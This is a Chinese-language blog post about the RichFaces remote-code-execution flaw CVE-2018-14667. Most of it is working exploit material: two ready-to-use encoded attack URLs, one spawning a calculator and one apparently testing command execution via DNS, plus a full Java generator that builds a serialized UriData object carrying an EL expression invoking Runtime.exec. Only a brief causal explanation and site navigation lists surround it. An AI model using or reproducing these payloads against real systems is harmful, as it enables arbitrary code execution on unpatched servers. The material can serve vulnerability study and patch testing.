RichFaces CVE-2018-14667
RichFaces CVE-2018-14667
0x00 RichFaces 簡述
RichFaces是一個基於LGPL協議開放源代碼的JSF(JavaServer Faces)組件庫,它可以使應用開發方便地集成AJAX。如今的RichFaces庫是由Ajax4jsf和RichFaces兩部分組成
0x01 html
0x01 漏洞成因
Java RichFaces框架中包含一個RCE漏洞,惡意***者構造包含org.ajax4jsf.resource.UserResource$UriData序列化對象的特定UserResource請求,RichFaces會先反序列化該UriData對象,而後使用EL表達式解析並獲取resource的modified、expires等值致使了任意EL表達式執行,經過構造特殊的EL表達式可實現遠程任意代碼執行。
參考連接中有具體的分析java
0x02 payload
彈出計算器(windows)
http://127.0.0.1:8080/richfaces-demo-3.3.0.GA-tomcat6/a4j/s/3_3_0.GAorg.ajax4jsf.resource.UserResource/n/s/-1487394660/DATA/eAHNlc9rE0EUx6fRan!4o9pirSLEVWwqMttKPdQaKFRRIbXQtFXbg0w2L8nE2R-dnU0Wa6U9ePEiWnrz5rU9eZcWEUHw4l-gBxERoQhexZnZNLFBPfQSc5rdfft9732-b19Wv6Fmn6OzLs9jUiThYNHPYQ6-G3AL8JQPfKJycXqK08tEEKR-nRe-xtDuFNpvcSACRl1HgCMEOpwqkhIxGXHy5nimCJYYTqG9EHpUas6hB6gphVpsN0tzFLKV6-YSYQHoi9CTtZxREiHOEQt8bLm25zpSG6eFTHTNZVngaVICfvvti-Tys3djMRRLoVaLEd-!QWzYXkNacOrkZQ1tvnwnqzUEOhJVSV0zDZwSRu-RDIPh0FPpe2VK7AeOLoCB8DEwPEnyYyAKbvZK6MlOfOo6mgNCTfsQCjnqiYqWofVxc6nu9pnHHzdjOq6zGldTev7wUfr7zPtLKkJVMKTM4NQqRAgCionnMWoRIdNGHOqT3OQyBDhOrCxdXJ34pJl0ZYgPkQm1XAId082HJjBzWoGvPZOY9niEayOP16Lqcw2HyqsWWWhcFVrMuL5mVKd23fbY0NpC261l0RsxOlrtvS603LY4-2H95xMFQGm3lldQeGqew1wAvsB5EKPK3kRf9ZhyiZwDeYPJQ!TQUOpYTR6eCBxBbTB0fFR-wpAqtfvUKbl3IeEEjPVhCMFKGBZhVtzoW!iHlZ4Xyq5Pbuu6no5qO7PZ!aN949CYaluzKt9vYD8o4KhzVvsZ4al8FGvvpz9!OTF!VY-dnOaYQF2aIXXxeCC8QMhAILZAHTW00TxJEOU36LVZHVLThiwl0VsmhERCAN8sepBP6zMOC8Jm8ZH-c!3xkYGB8wODSWPb6kg2ym4j1Htpl948f!n068b19y9f2duhFQ6Wn6LFRnURh2jFogPaqkBQhuWyBmXUK7SxM6MKcmXeyQVO0qio!wcmKd49Fd7LaKlhvLf-w!4EfB293BnwYuCLpLEl3UDaArUo8yfl9v0Fa!nW8w__.jsf
經過dns解析判斷 是否能夠執行命令
http://127.0.0.1:8080/richfaces-demo-3.3.0.GA-tomcat6/a4j/s/3_3_0.GAorg.ajax4jsf.resource.UserResource/n/s/-1487394660/DATA/eAHNVb9rFEEUnpxG88Mf0QRjFGFdxVxEZhOJRYwHgSgqXAzkkqhJIXN77y5zzv7I7GxuNUS0sLERiYJFrGwTRfwHtBVsUoqiQUREBBFsxZnZS84capHqtprZffu9733fmzeL31B9wNFRjxcwKZKotxjkMYfAC7kNeCwAPlLeHB7j9DQRBKmn9cTXBNqcRtttDkTAoOcKcIVAu9NFMkMsRtyCNZwtgi3602grRD6VmNPoBqpLowbHy9E8hVx5Xz9DWAh6E!mSyxEFEeE8sSHAtuf4niuxcUbIROc8lgOeITPAL796nppfeD2UQIk0arQZCYILxIH1HDKCU7cgOTQF8p-cxhBoT8ySelYGOCWMXidZBv2Rr9J3ypQ4CF1NgIEIMDA8SgpDIKa83JnIl5UE1HO1DgjVbUMo4qgjJi1Dq-Om0-3NE3dXvid0XOtaXAXp8e07mR8Ty6dUhGLQp8zg1J6KJQgpJr7PqE2ETBvrUJ3kIpchwHHywa2TiyOftCZtWRJAbEIll0D7dPGRBcwaV8JXvkmZtviEayP3V6Kqc!VHyqsGSdRQRItZL9AaVaGdd3zWtzTXdGledMYa7V2rvSq01HRz8sOLX!eUAAq7sfQM3T80y2E6hEDgAohBZW-ya22Z9ojsA!mCyUX80VToWHUeHgldQR0wdXxMP2lKlMp76s54VyHphox1YYjATpqGLzvFMIyK8MzJF!tcbMM1wNQzzK65!9js-5FU5OA6RaqVU5Jkv7f!bH65a0hJonUsPazRWlHIUeuk7oNY1vJhWloe!!zlwOxZ3a7yFCQEatPaUw8Ph8IPhQwE4gjUUrEk7kMpUukjWrHWNLYcyFES!2VBRKRAEFhFHwoZvcbRlHCYMdB9rNsY6Ok53tObMteNnFQttokZ6Vm3SU-zf4yTqiPw5zRRbdGiEXaWnqCFWqzQgHikox3a4lBQhuXlAMrg9-jdxgyekiP6Sj50U2YZvcbNVT51lH16ih7VpE-rd-3fjHqL3mzMqGIYiJS5Cl2jLgnUoBpqVN4gvwHh3hvH.jsf
0x03 payload
package richfaces1;
import com.sun.facelets.el.TagMethodExpression;
import com.sun.facelets.el.TagValueExpression;
import com.sun.facelets.tag.Location;
import com.sun.facelets.tag.TagAttribute;
import org.ajax4jsf.resource.UserResource;
import org.ajax4jsf.util.base64.URL64Codec;
import org.jboss.el.MethodExpressionImpl;
import org.jboss.el.ValueExpressionImpl;
import org.jboss.el.parser.*;
import org.jboss.seam.core.Expressions;
import org.richfaces.ui.application.StateMethodExpressionWrapper;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
import java.util.Date;
import java.util.zip.Deflater;
import javax.el.MethodExpression;
import javax.faces.context.FacesContext;
public class Main {
public static void main(String[] args) throws Exception{
String pocEL = "#{request.getClass().getClassLoader().loadClass(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null).exec(\" clac \")}";
System.out.println(pocEL);
// tomcat8.5.24 MethodExpression serialVersionUID
Long MethodExpressionSerialVersionUID = 8163925562047324656L;
Class clazz = Class.forName("javax.el.MethodExpression");
// Field field = clazz.getField("serialVersionUID");
// field.setAccessible(true);
Field modifiersField = Field.class.getDeclaredField("modifiers");
modifiersField.setAccessible(true);
//modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL);
//field.setLong(null, MethodExpressionSerialVersionUID);
// createContent
MethodExpressionImpl mei = new MethodExpressionImpl(pocEL, null, null, null, null, new Class[]{OutputStream.class, Object.class});
ValueExpressionImpl vei = new ValueExpressionImpl(pocEL, null, null, null, MethodExpression.class);
StateMethodExpressionWrapper smew = new StateMethodExpressionWrapper(mei, vei);
Location location = new Location("/richfaces/mediaOutput/examples/jpegSample.xhtml", 0, 0);
TagAttribute tagAttribute = new TagAttribute(location, "", "", "@11214", "createContent="+pocEL);
TagMethodExpression tagMethodExpression = new TagMethodExpression(tagAttribute, smew);
Class cls = Class.forName("javax.faces.component.StateHolderSaver");
Constructor ct = cls.getDeclaredConstructor(FacesContext.class, Object.class);
ct.setAccessible(true);
Object createContnet = ct.newInstance(null, tagMethodExpression);
//value
Object value = "haveTest";
//modified
TagAttribute tag = new TagAttribute(location, "", "", "just", "modified="+pocEL);
ValueExpressionImpl ve = new ValueExpressionImpl(pocEL+" modified", null, null, null, Date.class);
TagValueExpression tagValueExpression = new TagValueExpression(tag, ve);
Object modified = ct.newInstance(null, tagValueExpression);
//expires
TagAttribute tag2 = new TagAttribute(location, "", "", "have_fun", "expires="+pocEL);
ValueExpressionImpl ve2 = new ValueExpressionImpl(pocEL+" expires", null, null, null, Date.class);
TagValueExpression tagValueExpression2 = new TagValueExpression(tag2, ve2);
Object expires = ct.newInstance(null, tagValueExpression2);
//payload object
UserResource.UriData uriData = new UserResource.UriData();
//Constructor con = UserResource.class.getConstructor(new Class[]{});
Field fieldCreateContent = uriData.getClass().getDeclaredField("createContent");
fieldCreateContent.setAccessible(true);
fieldCreateContent.set(uriData, createContnet);
Field fieldValue = uriData.getClass().getDeclaredField("value");
fieldValue.setAccessible(true);
fieldValue.set(uriData, value);
Field fieldModefied = uriData.getClass().getDeclaredField("modified");
fieldModefied.setAccessible(true);
fieldModefied.set(uriData, modified);
Field fieldExpires = uriData.getClass().getDeclaredField("expires");
fieldExpires.setAccessible(true);
fieldExpires.set(uriData, expires);
//encrypt
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
objectOutputStream.writeObject(uriData);
objectOutputStream.flush();
objectOutputStream.close();
byteArrayOutputStream.close();
byte[] pocData = byteArrayOutputStream.toByteArray();
Deflater compressor = new Deflater(1);
byte[] compressed = new byte[pocData.length + 100];
compressor.setInput(pocData);
compressor.finish();
int totalOut = compressor.deflate(compressed);
byte[] zipsrc = new byte[totalOut];
System.arraycopy(compressed, 0, zipsrc, 0, totalOut);
compressor.end();
byte[] dataArray = URL64Codec.encodeBase64(zipsrc);
String poc = "/DATA/" + new String(dataArray, "ISO-8859-1") + ".jsf";
System.out.println(poc);
}
}
payload須要導入的包:ajax
參考連接
https://×××w.youtube.com/watch?v=HR7-nL5G91w
https://xz.aliyun.com/t/3264#toc-1windows
相關文章
- 1. RichFaces 中的 ajax:support
- 2. RichFaces樹組件的用法
- 3. RichFaces自動構建樹實現
- 4. 使用 Richfaces/Ajax4Jsf 創建 Web 應用
- 5. 在WebLogic 12c上運行RichFaces 4.1.0.Final
- 6. 在RichFaces中使用Facelets模板
- 7. 【第二版】RichFaces中使用datatable和datascroller進行分頁(使用數據庫分頁,改良版)(含源碼)(JSF 1.2,RichFaces 3.2.1GA)
- 8. RichFaces 簡介,將類似桌面的特性添加到瀏覽器應用程序中
- 9. richface的配置、用法介紹和注意事項
- 10. No saved view state could be found for the view identifier
- 更多相關文章...
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 「插件」Runner更新Pro版,幫助設計師遠離996
- 2. 錯誤 707 Could not load file or assembly ‘Newtonsoft.Json, Version=12.0.0.0, Culture=neutral, PublicKe
- 3. Jenkins 2018 報告速覽,Kubernetes使用率躍升235%!
- 4. TVI-Android技術篇之註解Annotation
- 5. android studio啓動項目
- 6. Android的ADIL
- 7. Android卡頓的檢測及優化方法彙總(線下+線上)
- 8. 登錄註冊的業務邏輯流程梳理
- 9. NDK(1)創建自己的C/C++文件
- 10. 小菜的系統框架界面設計-你的評估是我的決策
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. RichFaces 中的 ajax:support
- 2. RichFaces樹組件的用法
- 3. RichFaces自動構建樹實現
- 4. 使用 Richfaces/Ajax4Jsf 創建 Web 應用
- 5. 在WebLogic 12c上運行RichFaces 4.1.0.Final
- 6. 在RichFaces中使用Facelets模板
- 7. 【第二版】RichFaces中使用datatable和datascroller進行分頁(使用數據庫分頁,改良版)(含源碼)(JSF 1.2,RichFaces 3.2.1GA)
- 8. RichFaces 簡介,將類似桌面的特性添加到瀏覽器應用程序中
- 9. richface的配置、用法介紹和注意事項
- 10. No saved view state could be found for the view identifier